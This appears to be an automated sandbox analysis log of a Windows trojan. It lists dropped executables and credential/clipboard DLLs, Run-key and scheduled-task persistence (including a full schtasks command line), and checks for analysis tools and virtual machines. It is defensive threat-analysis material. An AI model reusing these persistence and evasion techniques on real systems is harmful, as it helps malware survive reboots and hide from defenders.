Source: C:\ProgramData\MPGPH131\MPGPH131.exe Unpacked PE file: 20.2.MPGPH131.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 22.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Unpacked PE file: 24.2.amert.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 25.2.explorgu.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 26.2.RageMP131.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Unpacked PE file: 27.2.ad0e9cf6d6.exe.100000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Unpacked PE file: 28.2.RageMP131.exe.e30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW; vs :ER;.rsrc:W;.idata :W; :EW;kmmiqwbd:EW;fznmywdp:EW;
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Unpacked PE file: 29.2.explorgu.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW; vs :ER;.rsrc:W;.idata :W; :EW;nrhwmcml:EW;cbtiwtyd:EW;
Source: initial sample Static PE information: section where entry point is pointing to: otarkcdf
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: .idata
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: byqduimw
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: otarkcdf
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name: byqduimw
Source: explorha.exe.0.dr Static PE information: section name: otarkcdf
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: .idata
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name:
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: kmmiqwbd
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: fznmywdp
Source: cred64[1].dll.6.dr Static PE information: section name: _RDATA
Source: cred64.dll.6.dr Static PE information: section name: _RDATA
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: plzndgzq
Source: sarra[1].exe.6.dr Static PE information: section name: imnknifl
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: nrhwmcml
Source: amert[1].exe.6.dr Static PE information: section name: cbtiwtyd
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: nrhwmcml
Source: amert.exe.6.dr Static PE information: section name: cbtiwtyd
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: kmmiqwbd
Source: random[1].exe0.6.dr Static PE information: section name: fznmywdp
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: .idata
Source: RageMP131.exe.14.dr Static PE information: section name:
Source: RageMP131.exe.14.dr Static PE information: section name: kmmiqwbd
Source: RageMP131.exe.14.dr Static PE information: section name: fznmywdp
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: .idata
Source: MPGPH131.exe.14.dr Static PE information: section name:
Source: MPGPH131.exe.14.dr Static PE information: section name: kmmiqwbd
Source: MPGPH131.exe.14.dr Static PE information: section name: fznmywdp
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: .idata
Source: explorgu.exe.24.dr Static PE information: section name:
Source: explorgu.exe.24.dr Static PE information: section name: nrhwmcml
Source: explorgu.exe.24.dr Static PE information: section name: cbtiwtyd
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push ecx; mov dword ptr [esp], 350DAB43h 0_2_00E2D044
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push edi; mov dword ptr [esp], 5D8F0098h 0_2_00E2D0E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D034 push 41271905h; mov dword ptr [esp], esi 0_2_00E2D114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push 524417C7h; mov dword ptr [esp], esi 0_2_00E2D005
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push eax; mov dword ptr [esp], 57B86D65h 0_2_00E2D013
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push edx; mov dword ptr [esp], 571ECD59h 0_2_00E2D021
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push ecx; mov dword ptr [esp], 350DAB43h 0_2_00E2D044
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push edi; mov dword ptr [esp], 5D8F0098h 0_2_00E2D0E4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D000 push 41271905h; mov dword ptr [esp], esi 0_2_00E2D114
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B129A0 push esp; ret 0_2_00B129A1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push 2910D7E3h; mov dword ptr [esp], edx 0_2_00E2D189
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push 15830EA0h; mov dword ptr [esp], ebp 0_2_00E2D1A6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push edi; mov dword ptr [esp], 682C439Fh 0_2_00E2D1B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push ecx; mov dword ptr [esp], esi 0_2_00E2D1D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00E2D184 push ebp; mov dword ptr [esp], 00000000h 0_2_00E2D24B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B09420 push ebx; ret 0_2_00B0942A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B08DE6 push esi; iretd 0_2_00B08DE7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_00B1EFBC push ecx; ret 0_2_00B1EFCF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Code function: 0_2_050005BD push 0000005Bh; retn 0004h 0_2_050005C4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push ecx; mov dword ptr [esp], 350DAB43h 1_2_007AD044
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push edi; mov dword ptr [esp], 5D8F0098h 1_2_007AD0E4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD034 push 41271905h; mov dword ptr [esp], esi 1_2_007AD114
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push 524417C7h; mov dword ptr [esp], esi 1_2_007AD005
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push eax; mov dword ptr [esp], 57B86D65h 1_2_007AD013
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push edx; mov dword ptr [esp], 571ECD59h 1_2_007AD021
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push ecx; mov dword ptr [esp], 350DAB43h 1_2_007AD044
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push edi; mov dword ptr [esp], 5D8F0098h 1_2_007AD0E4
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD000 push 41271905h; mov dword ptr [esp], esi 1_2_007AD114
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0048C0E8 push cs; retn 0002h 1_2_0048C0E9
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD184 push 2910D7E3h; mov dword ptr [esp], edx 1_2_007AD189
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_007AD184 push 15830EA0h; mov dword ptr [esp], ebp 1_2_007AD1A6
Source: SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Static PE information: section name: entropy: 7.985971961341056
Source: explorha.exe.0.dr Static PE information: section name: entropy: 7.985971961341056
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: entropy: 7.93014511868909
Source: ad0e9cf6d6.exe.6.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: sarra[1].exe.6.dr Static PE information: section name: entropy: 7.93021329597093
Source: sarra[1].exe.6.dr Static PE information: section name: plzndgzq entropy: 7.949874622894616
Source: amert[1].exe.6.dr Static PE information: section name: entropy: 7.9828707618989405
Source: amert[1].exe.6.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Source: amert.exe.6.dr Static PE information: section name: entropy: 7.9828707618989405
Source: amert.exe.6.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Source: random[1].exe0.6.dr Static PE information: section name: entropy: 7.93014511868909
Source: random[1].exe0.6.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: RageMP131.exe.14.dr Static PE information: section name: entropy: 7.93014511868909
Source: RageMP131.exe.14.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: MPGPH131.exe.14.dr Static PE information: section name: entropy: 7.93014511868909
Source: MPGPH131.exe.14.dr Static PE information: section name: kmmiqwbd entropy: 7.94902151526135
Source: explorgu.exe.24.dr Static PE information: section name: entropy: 7.9828707618989405
Source: explorgu.exe.24.dr Static PE information: section name: nrhwmcml entropy: 7.953187785873698
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000051001\b977f667d6.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\amert[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sarra[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File created: C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File created: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ad0e9cf6d6.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000042001\ad0e9cf6d6.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000049001\amert.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73E4 second address: CF73F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F3620DECF86h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73F1 second address: CF73F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73F5 second address: CF73FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF73FB second address: CF7405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F3620BBB046h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7405 second address: CF742B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F3620DECF8Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3620DECF92h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF742B second address: CF742F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76AB second address: CF76B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F3620DECF86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76B5 second address: CF76C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F3620BBB04Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF76C9 second address: CF76CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7854 second address: CF785E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3620BBB046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF785E second address: CF787A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F3620DECF86h 0x00000009 jmp 00007F3620DECF91h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF787A second address: CF7884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF79D8 second address: CF7A04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F362081F59Bh 0x00000007 jbe 00007F362081F596h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F362081F5A4h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B71 second address: CF7B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22693.32340.exe RDTSC instruction interceptor: First address: CF7B75 second address: CF7B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
